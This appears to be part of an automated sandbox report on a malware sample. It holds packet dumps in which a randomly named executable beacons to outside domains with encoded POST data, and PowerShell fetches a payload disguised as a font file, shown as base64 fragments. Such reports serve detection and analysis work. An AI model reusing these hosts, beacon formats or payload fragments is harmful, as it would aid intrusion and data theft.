61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Oct 15, 2024 09:16:57.480453968 CEST	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Oct 15, 2024 09:16:57.480465889 CEST	1236	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Oct 15, 2024 09:16:57.480496883 CEST	636	IN	Data Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20 Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
Oct 15, 2024 09:16:57.480506897 CEST	1236	IN	Data Raw: 77 6f 72 6b 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 46 72 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 Data Ascii: work-Trace');; return false;">Framework Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Framework-Trace');show('Full-Trace');; return false;">Full Trace</a> <div id="Application-Trace" sty
Oct 15, 2024 09:16:57.480518103 CEST	1236	IN	Data Raw: 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 71 75 65 73 74 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 Data Ascii: ctionpack (5.2.6) lib/action_dispatch/middleware/request_id.rb:27:in `call'</a><br><a class="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call'</a><br><a class="trace-frames" data-frame-id="8
Oct 15, 2024 09:16:57.480540037 CEST	1236	IN	Data Raw: 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 34 37 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e Data Ascii: e-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client'</a><br><a class="trace-frames" data-frame-id="17" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run'</a><br><a class="trace-frames" data-frame-id="1
Oct 15, 2024 09:16:57.480551958 CEST	1236	IN	Data Raw: 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 Data Ascii: ass="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/request_id.rb:27:in `call'</a><br><a class="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call'<
Oct 15, 2024 09:16:57.480562925 CEST	848	IN	Data Raw: 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 Data Ascii: t'</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client'</a><br><a class="trace-frames" data-frame-id="17" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run'<
Oct 15, 2024 09:16:57.480632067 CEST	1236	IN	Data Raw: 73 65 74 2e 66 72 61 6d 65 49 64 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 65 63 74 65 64 46 72 61 6d 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 73 65 6c Data Ascii: set.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); } target.className += " selected"; selectedFrame = target; // Change the extracte
Oct 15, 2024 09:16:57.485409975 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 73 65 61 72 63 68 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 74 68 20 4d 61 74 63 68 22 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 70 61 74 68 5b 5d 22 20 2f 3e 0a Data Ascii: <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead> <tbody class='exact_matches' id='exact_matches'> </tbody> <tbody class='fuzzy_matches' id='fuzzy_ma

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	62045	216.40.34.41	80	6240	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:16:59.589140892 CEST	416	OUT	GET /y868/?w2h=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOgVvnrxX99+b5swpR4hpoIEYOJyEs1w==&1DbH=RRW4t2_hkFqt HTTP/1.1 Host: www.newhopetoday.app Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Oct 15, 2024 09:17:00.072474003 CEST	1236	IN	HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin content-type: text/html; charset=utf-8 etag: W/"489b1cc03742192cd82a546616d2ba37" cache-control: max-age=0, private, must-revalidate x-request-id: 3604d65c-e335-4a97-b8f9-2de5deb71c97 x-runtime: 0.004716 transfer-encoding: chunked connection: close Data Raw: 31 37 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED] Data Ascii: 1759<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
Oct 15, 2024 09:17:00.072510004 CEST	1236	IN	Data Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_reuser-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>newhopetoday.app</h1><h2>is a totally awesome idea still being worked on.</h2><
Oct 15, 2024 09:17:00.072520971 CEST	424	IN	Data Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e Data Ascii: rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your
Oct 15, 2024 09:17:00.072530985 CEST	1236	IN	Data Raw: 69 72 63 6c 65 20 63 78 3d 22 35 30 22 20 63 79 3d 22 35 30 22 20 72 3d 22 35 30 22 20 2f 3e 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 73 63 61 6c 65 28 30 2e 32 35 20 30 2e 32 35 29 20 74 72 61 6e 73 6c 61 74 65 28 33 30 20 35 30 29 22 3e 3c 70 Data Ascii: ircle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.53
Oct 15, 2024 09:17:00.072536945 CEST	1236	IN	Data Raw: 38 39 2c 31 2e 32 33 33 39 38 20 2d 32 2e 32 36 37 33 2c 30 20 2d 34 2e 34 37 31 31 34 2c 2d 30 2e 32 32 31 32 34 20 2d 36 2e 36 32 30 31 31 2c 2d 30 2e 36 33 31 31 34 20 34 2e 34 37 38 30 31 2c 31 33 2e 39 37 38 35 37 20 31 37 2e 34 37 32 31 34 Data Ascii: 89,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8
Oct 15, 2024 09:17:00.072547913 CEST	424	IN	Data Raw: 31 20 32 39 20 31 38 2e 35 20 37 31 2e 35 74 31 30 20 31 30 33 74 33 20 39 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 30 2e 35 20 37 36 2e 35 74 30 2e 35 20 37 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 33 20 39 36 2e 35 74 2d 31 30 20 31 30 33 74 2d 31 Data Ascii: 1 29 18.5 71.5t10 103t3 96.5t0 105.5t-0.5 76.5t0.5 76.5t0 105.5t-3 96.5t-10 103t-18.5 71.5q-20 50 -58 88t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q
Oct 15, 2024 09:17:00.072559118 CEST	687	IN	Data Raw: 61 76 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 32 34 20 48 6f 76 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f Data Ascii: av><ul><li>Copyright © 2024 Hover</li><li><a rel="nofollow" href="https://www.hover.com/tos?source=parked">Terms of Service</a></li><li><a rel="nofollow" href="https://www.hover.com/privacy?source=parked">Privacy</a></li></ul></nav>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	62046	3.33.130.190	80	6240	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:17:05.175283909 CEST	676	OUT	POST /tcwz/ HTTP/1.1 Host: www.ladylawher.org Accept: / Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 192 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.ladylawher.org Referer: http://www.ladylawher.org/tcwz/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 Data Raw: 77 32 68 3d 61 37 30 6c 4b 6f 58 52 4e 4d 2b 64 6b 77 57 55 36 75 72 31 77 6a 2f 70 6e 6f 4f 59 70 6b 72 59 73 34 41 4a 65 55 68 53 48 52 77 77 4f 4e 2b 51 77 63 4a 77 46 64 45 71 46 4b 43 75 36 6d 6b 78 4f 36 71 69 31 33 55 34 72 42 4a 37 6f 68 72 44 33 67 49 30 4d 47 4e 73 7a 52 2f 71 31 6c 51 2f 32 47 6d 56 55 6a 53 59 78 2f 58 41 62 6f 43 54 59 77 6b 4a 65 33 62 72 78 6c 4e 43 76 2b 4a 67 46 39 62 52 52 64 35 54 6b 2f 57 6b 46 77 43 4c 7a 36 4f 62 48 76 4c 4a 70 6a 4b 33 5a 2f 78 79 74 4f 38 47 75 32 76 57 56 55 70 61 33 2b 54 6f 55 6b 71 31 7a 51 74 58 6c 53 67 59 Data Ascii: w2h=a70lKoXRNM+dkwWU6ur1wj/pnoOYpkrYs4AJeUhSHRwwON+QwcJwFdEqFKCu6mkxO6qi13U4rBJ7ohrD3gI0MGNszR/q1lQ/2GmVUjSYx/XAboCTYwkJe3brxlNCv+JgF9bRRd5Tk/WkFwCLz6ObHvLJpjK3Z/xytO8Gu2vWVUpa3+ToUkq1zQtXlSgY

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.9	62047	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:17:08.195472956 CEST	700	OUT	POST /tcwz/ HTTP/1.1 Host: www.ladylawher.org Accept: / Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.ladylawher.org Referer: http://www.ladylawher.org/tcwz/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 Data Raw: 77 32 68 3d 61 37 30 6c 4b 6f 58 52 4e 4d 2b 64 69 6a 4f 55 35 4a 66 31 79 44 2f 6d 6a 59 4f 59 38 55 72 63 73 34 4d 4a 65 51 35 38 48 6a 55 77 4f 70 75 51 78 65 68 77 4c 39 45 71 4e 71 43 76 30 47 6b 75 4f 36 6e 52 31 33 6f 34 72 42 64 37 6f 67 62 44 32 58 63 37 4f 57 4e 71 37 78 2f 6f 32 56 51 2f 32 47 6d 56 55 69 32 32 78 37 44 41 62 59 79 54 43 56 49 49 51 58 62 71 35 46 4e 43 34 75 4a 6b 46 39 61 32 52 59 5a 35 6b 37 6d 6b 46 31 6d 4c 32 34 32 59 4d 76 4c 48 33 54 4c 42 61 50 34 73 72 4d 45 51 6c 6b 76 47 50 69 4d 37 30 66 76 32 46 57 6a 75 6d 48 74 77 69 31 70 77 59 2f 49 78 55 46 76 57 5a 33 5a 55 2f 79 34 70 34 54 61 68 56 51 3d 3d Data Ascii: w2h=a70lKoXRNM+dijOU5Jf1yD/mjYOY8Urcs4MJeQ58HjUwOpuQxehwL9EqNqCv0GkuO6nR13o4rBd7ogbD2Xc7OWNq7x/o2VQ/2GmVUi22x7DAbYyTCVIIQXbq5FNC4uJkF9a2RYZ5k7mkF1mL242YMvLH3TLBaP4srMEQlkvGPiM70fv2FWjumHtwi1pwY/IxUFvWZ3ZU/y4p4TahVQ==

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49762	77.105.36.128	443	7816	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-15 07:15:02 UTC	167	OUT	GET /Dipodid.pfm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: promenter.rs Connection: Keep-Alive
2024-10-15 07:15:03 UTC	257	IN	HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 07:15:02 GMT Server: Apache Last-Modified: Mon, 14 Oct 2024 10:04:22 GMT Accept-Ranges: bytes Content-Length: 457672 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/x-font-type1
2024-10-15 07:15:03 UTC	7935	IN	Data Raw: 36 77 4b 68 6c 6e 45 42 6d 37 74 39 62 67 6f 41 36 77 4c 2f 33 33 45 42 6d 77 4e 63 4a 41 54 72 41 71 65 36 36 77 49 47 6e 72 6c 6f 69 57 4e 54 63 51 47 62 63 51 47 62 67 66 45 77 4e 30 2b 66 36 77 4a 41 72 4f 73 43 6a 63 36 42 38 56 69 2b 4c 4d 78 78 41 5a 76 72 41 6c 31 36 36 77 4a 48 58 75 73 43 6d 2f 4b 36 35 5a 6f 4e 33 33 45 42 6d 33 45 42 6d 2b 73 43 53 78 7a 72 41 6b 31 54 4d 63 72 72 41 69 6f 75 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4a 56 42 4e 48 69 36 77 4b 77 38 2b 73 43 45 47 75 44 77 51 54 72 41 6f 6e 70 63 51 47 62 67 66 6c 44 39 46 73 46 66 4d 6c 78 41 5a 76 72 41 68 50 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 36 77 4b 54 78 48 45 42 6d 34 48 44 64 2f 33 59 41 6e 45 42 6d 2b 73 43 6a 33 53 36 51 33 58 41 31 6e 45 42 6d 2b 73 Data Ascii: 6wKhlnEBm7t9bgoA6wL/33EBmwNcJATrAqe66wIGnrloiWNTcQGbcQGbgfEwN0+f6wJArOsCjc6B8Vi+LMxxAZvrAl166wJHXusCm/K65ZoN33EBm3EBm+sCSxzrAk1TMcrrAioucQGbiRQLcQGb6wJVBNHi6wKw8+sCEGuDwQTrAonpcQGbgflD9FsFfMlxAZvrAhPbi0QkBHEBm3EBm4nD6wKTxHEBm4HDd/3YAnEBm+sCj3S6Q3XA1nEBm+s
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 4f 34 49 4a 55 50 4c 7a 69 71 55 6e 6e 2b 45 55 38 54 7a 39 72 42 4e 37 44 69 64 36 34 4c 37 2f 4e 79 69 78 43 7a 41 42 2f 32 4a 32 4c 2b 75 49 4a 55 2f 74 72 6e 44 48 76 79 59 54 62 72 4e 56 65 2f 45 4c 71 48 57 56 6c 30 53 45 46 65 35 31 2b 70 4f 41 36 48 57 55 37 48 58 77 6f 63 33 31 4f 79 50 33 74 51 64 4d 77 30 56 5a 75 75 30 6e 69 79 31 31 33 43 6c 6c 4c 52 2f 36 54 58 35 53 63 44 78 44 38 43 52 57 6b 36 6d 37 4e 47 34 43 2b 32 6b 50 4c 61 62 44 45 36 6e 57 36 44 51 72 53 43 67 75 47 59 67 43 61 36 6e 58 39 4c 6a 6f 54 41 76 74 67 42 66 74 42 71 48 6d 79 43 59 79 38 5a 75 59 69 37 38 48 43 37 2b 35 70 78 53 6d 51 37 70 48 4b 46 6f 36 45 59 4e 45 42 2b 4b 31 75 45 6c 4d 70 78 73 62 73 2b 71 4c 33 46 73 39 58 70 43 6b 61 78 51 6f 34 6e 47 39 57 4b 7a Data Ascii: O4IJUPLziqUnn+EU8Tz9rBN7Did64L7/NyixCzAB/2J2L+uIJU/trnDHvyYTbrNVe/ELqHWVl0SEFe51+pOA6HWU7HXwoc31OyP3tQdMw0VZuu0niy113CllLR/6TX5ScDxD8CRWk6m7NG4C+2kPLabDE6nW6DQrSCguGYgCa6nX9LjoTAvtgBftBqHmyCYy8ZuYi78HC7+5pxSmQ7pHKFo6EYNEB+K1uElMpxsbs+qL3Fs9XpCkaxQo4nG9WKz
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 35 74 64 54 4a 64 59 67 49 72 69 4a 76 6f 34 31 53 53 31 34 51 46 47 44 54 34 2b 66 67 49 2f 61 51 35 71 33 41 66 57 52 4c 4f 32 31 30 45 6a 56 67 64 41 58 67 30 4b 2f 79 34 4a 32 45 2f 52 4d 4a 69 2f 70 72 6e 49 76 36 61 35 79 4c 2b 6d 75 63 69 2f 70 72 6e 49 76 64 74 50 2b 4b 38 32 38 50 79 73 55 67 50 32 36 65 30 71 65 54 35 70 38 62 74 31 33 38 33 41 4c 37 30 37 52 58 4e 4d 58 4f 4d 65 49 58 75 56 39 37 6d 56 69 57 70 36 6b 64 65 59 79 4c 6a 2b 68 37 67 54 59 4c 6b 52 37 4d 46 33 4f 4c 6e 5a 74 6e 44 52 6c 54 6a 6d 42 2b 63 33 6e 64 76 77 38 6e 74 78 78 33 4b 38 48 54 4b 49 69 57 31 39 4f 4c 55 33 61 59 51 6f 4d 68 4b 4a 5a 46 75 47 59 66 6b 56 57 4a 45 66 34 4f 54 73 41 53 30 69 53 6d 66 6e 4c 57 54 76 6a 36 65 35 7a 75 54 64 4e 36 6c 6d 54 52 31 37 Data Ascii: 5tdTJdYgIriJvo41SS14QFGDT4+fgI/aQ5q3AfWRLO210EjVgdAXg0K/y4J2E/RMJi/prnIv6a5yL+muci/prnIvdtP+K828PysUgP26e0qeT5p8bt1383AL707RXNMXOMeIXuV97mViWp6kdeYyLj+h7gTYLkR7MF3OLnZtnDRlTjmB+c3ndvw8ntxx3K8HTKIiW19OLU3aYQoMhKJZFuGYfkVWJEf4OTsAS0iSmfnLWTvj6e5zuTdN6lmTR17
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 74 52 47 38 5a 59 77 6f 4c 4f 54 7a 6a 50 65 70 74 48 32 35 46 35 67 6f 37 76 61 64 4f 37 4f 4b 4e 78 5a 6e 68 43 4a 45 4c 53 64 58 50 44 44 71 70 4d 74 76 2b 76 39 48 4a 53 6f 6f 50 6d 75 4a 61 30 74 64 79 66 59 64 44 5a 46 75 31 72 57 75 63 69 2f 70 72 6e 49 76 36 61 35 79 4c 2b 6d 75 63 69 2f 70 72 74 77 6c 49 47 6b 67 75 51 59 4c 38 68 57 47 6d 41 37 51 4e 47 57 77 38 2f 2f 79 79 74 38 77 37 4a 42 53 69 54 64 65 2b 68 52 54 75 63 76 39 4c 52 53 43 33 50 51 41 43 48 47 4b 61 46 73 4f 52 34 36 70 6e 61 66 57 57 4e 6b 77 68 72 56 6c 52 77 58 58 67 7a 77 62 54 71 71 61 64 74 34 66 4b 35 52 71 70 38 55 56 6b 75 53 53 6d 39 63 63 6f 76 74 49 4e 36 53 74 33 6e 4a 50 6a 4a 6e 72 74 2b 72 49 77 4e 52 6c 61 6f 6b 59 50 34 6b 4a 51 7a 41 42 2f 34 4a 32 4c 2b 6a Data Ascii: tRG8ZYwoLOTzjPeptH25F5go7vadO7OKNxZnhCJELSdXPDDqpMtv+v9HJSooPmuJa0tdyfYdDZFu1rWuci/prnIv6a5yL+muci/prtwlIGkguQYL8hWGmA7QNGWw8//yyt8w7JBSiTde+hRTucv9LRSC3PQACHGKaFsOR46pnafWWNkwhrVlRwXXgzwbTqqadt4fK5Rqp8UVkuSSm9ccovtIN6St3nJPjJnrt+rIwNRlaokYP4kJQzAB/4J2L+j
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 64 53 64 35 79 35 7a 2b 72 39 78 56 71 38 33 6f 42 44 7a 49 52 6c 48 2b 48 69 45 30 63 68 2b 68 2b 67 42 35 7a 43 55 6e 51 6c 34 46 4b 69 58 71 4c 47 49 4f 6b 4c 73 52 36 6c 38 62 53 66 36 6e 47 73 67 54 67 49 53 2f 37 61 35 79 45 66 37 36 46 69 2f 6f 37 4a 41 62 6f 64 2f 6d 2b 43 2b 5a 30 37 2f 2f 53 77 67 6f 4a 52 71 6c 32 6a 35 37 4e 46 33 4f 4b 6e 59 70 6e 37 31 66 31 36 4b 39 55 66 77 76 67 76 6d 35 38 74 56 45 57 59 39 64 36 78 4a 73 52 7a 6e 66 62 45 53 56 64 48 46 4c 61 42 6f 58 73 67 4d 41 39 63 55 69 71 4d 56 4d 6a 6c 75 72 53 2b 6f 55 47 4d 68 33 32 68 67 42 31 69 2f 70 6b 47 44 36 68 61 35 7a 54 4e 6d 4d 4d 41 75 75 72 32 47 6a 6c 52 6b 4a 59 4f 7a 73 54 45 66 32 56 4a 4d 62 34 56 64 7a 65 4c 71 79 38 78 55 2f 37 67 54 54 79 6d 2f 79 68 6f 4a Data Ascii: dSd5y5z+r9xVq83oBDzIRlH+HiE0ch+h+gB5zCUnQl4FKiXqLGIOkLsR6l8bSf6nGsgTgIS/7a5yEf76Fi/o7JAbod/m+C+Z07//SwgoJRql2j57NF3OKnYpn71f16K9Ufwvgvm58tVEWY9d6xJsRznfbESVdHFLaBoXsgMA9cUiqMVMjlurS+oUGMh32hgB1i/pkGD6ha5zTNmMMAuur2GjlRkJYOzsTEf2VJMb4VdzeLqy8xU/7gTTym/yhoJ
